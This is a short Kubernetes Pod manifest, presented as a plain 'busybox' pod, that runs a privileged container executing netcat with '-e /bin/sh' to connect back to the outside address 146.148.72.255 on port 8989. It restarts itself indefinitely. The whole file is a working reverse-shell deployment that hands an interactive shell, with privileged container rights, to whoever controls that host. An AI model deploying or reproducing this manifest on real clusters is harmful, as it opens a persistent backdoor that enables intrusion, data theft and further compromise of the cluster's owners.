apiVersion: v1
kind: Pod
metadata:
  name: busybox
  labels:
    app: busybox
spec:
  containers:
  - name: busybox
    image: busybox
    command: ["/bin/nc"]
    args: ["146.148.72.255", "8989", "-e", "/bin/sh", "-i"]
    stdin: true
    tty: true
    securityContext:
      privileged: true
  restartPolicy: Always

